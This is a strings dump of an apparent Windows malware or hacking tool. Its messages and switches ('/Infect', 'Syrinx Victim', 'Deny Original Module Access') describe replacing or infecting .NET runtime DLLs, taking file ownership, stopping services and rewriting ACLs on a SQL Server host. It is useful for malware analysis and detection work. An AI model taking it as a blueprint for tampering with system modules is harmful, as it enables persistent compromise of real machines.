!This program cannot be run in DOS mode.
`.rdata
@.data
tdSSSj
SVWj?3
SVWj?3
SVWj?3
IthItII
HtNHt3Hud
SSSSSS
PSSSSSSh
VWtP9]
PSSSSSSSj
HeapFree
HeapAlloc
GetProcessHeap
MoveFileExA
GetLastError
DeleteFileA
SetFileAttributesA
SetConsoleTextAttribute
GetConsoleScreenBufferInfo
GetStdHandle
CloseHandle
OpenProcess
GetProcAddress
GetModuleHandleA
Module32Next
Module32First
CreateToolhelp32Snapshot
UnmapViewOfFile
IsBadReadPtr
MapViewOfFile
CreateFileMappingA
CreateFileA
GetTickCount
TerminateProcess
SetFileTime
GetFileTime
CopyFileA
GetFileSize
WriteFile
SetFilePointer
FlushViewOfFile
GetFileAttributesA
GetModuleFileNameA
GetSystemInfo
GlobalFree
GlobalAlloc
FreeLibrary
LoadLibraryA
LocalFree
LocalAlloc
QueryDosDeviceA
GetCurrentProcess
FindClose
FindFirstFileA
KERNEL32.dll
GetUserObjectSecurity
USER32.dll
CloseServiceHandle
EnumServicesStatusExA
OpenSCManagerA
ChangeServiceConfig2A
OpenServiceA
QueryServiceStatusEx
ControlService
EnumDependentServicesA
StartServiceA
LookupAccountSidA
IsValidSid
GetSecurityDescriptorOwner
GetTokenInformation
OpenProcessToken
AdjustTokenPrivileges
LookupPrivilegeValueA
FreeSid
SetNamedSecurityInfoA
SetEntriesInAclA
AllocateAndInitializeSid
BuildExplicitAccessWithNameA
GetNamedSecurityInfoA
GetFileSecurityA
GetSecurityDescriptorDacl
DeleteAce
GetAce
GetAclInformation
CheckTokenMembership
ADVAPI32.dll
CheckSumMappedFile
imagehlp.dll
_strcmpi
strlen
printf
memset
_strnicmp
_except_handler3
_local_unwind2
_splitpath
memcmp
memcpy
malloc
_vsnprintf
strncpy
MSVCRT.dll
_XcptFilter
__p___initenv
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_controlfp
Syrinx Victim
Syrinx's Victim
/Replace
/Infect
/Disable
/Disablemscoreei
/Disablemscorsec
/DisableClr
SeSecurityPrivilege
SeDebugPrivilege
/Check
Fail To Get SQL Info
%ld %s
%ld %s("%s")
Delete OLE File Successfully
Fail To Delete OLE File(%d)
Delete & Move File All Failure
Delete OLE File On Reboot
Move OLE File Successfully
%s.bak
OLE File Already Gone
\ODSOLE70.dll
Set Service Auto Restart Failure.(%d)
Fail To Open Service
Fail To Open SC Manager
Set Service Auto Restart Successfully
\MSCOREEI.dll
\MSCORSEC.dll
\CLR.dll
NtWow64QueryInformationProcess64
NtWow64ReadVirtualMemory64
NTDLL.DLL
IsWow64Process
kernel32.dll
Fail To Get Sql Info
%s%s%s.bak
%s%s.bak
BackUP File = %s
Fail To Create File %s(%d)
Fail To Create Mapping
Fail To Map View
It's Not An Executable
Fail To Get File Size
Free Space Found
It's Infected
Mis-Match PE File Version
Fail To Back UP File
Try Extenion
BackUP Successfully
Fail To Stop Service %s
Starting %s......
Infection Successfully(Not Backup Method)
Infection Successfully(Backup Method)
Stopping %s......
NetInfo.dll
%s.dll
Fail To Start Service %d
Fail To Copy New Module %d
Replace Module Successfully
Set Backup Module Access Failure
Deny Original Module Access Failure
Copy Module Failure(%s -> %s)
Critical Module Not Loaded Or Find Module Method Failure
Set Backup Module Access Successfully
Delete Backup Module ACL Successfully
Delete Backup Module ACL Failure
Deny Original Module Access Successfully
Copy Module Successfully
Module = %s
%s\clr.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
%s\mscorsec.dll
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsec.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsec.dll
%s\mscoreei.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll
KERNEL32.DLL
GetNativeSystemInfo
CreateWellKnownSid
Advapi32.dll
GetExtendedTcpTable
iphlpapi.dll
GetProcessImageFileNameA
PSAPI.DLL
\Device\HarddiskVolume
SeTakeOwnershipPrivilege
Fail To Set Ownership
Fail To Set Security. Error Code = %d
SetEntriesInAcl Failure
Fail To Set Ownership After GetNamedSecurityInfo Failure
GetNamedSecurityInfo Failure %d
Object Doesn't Exist
Invalid SID
Invalid Option
Fail To Get File Security
It's FAT 32
Error = %d
Fail To Delete Ace
No Index Found(Probably Deny Access Not Set)
No ACL Found
Fail To Get ACL Info
File Not Found
Delete One ACL Successfully
Set "%s" Deny Access Successfully On %s
Set "%s" Deny Access Failure On %s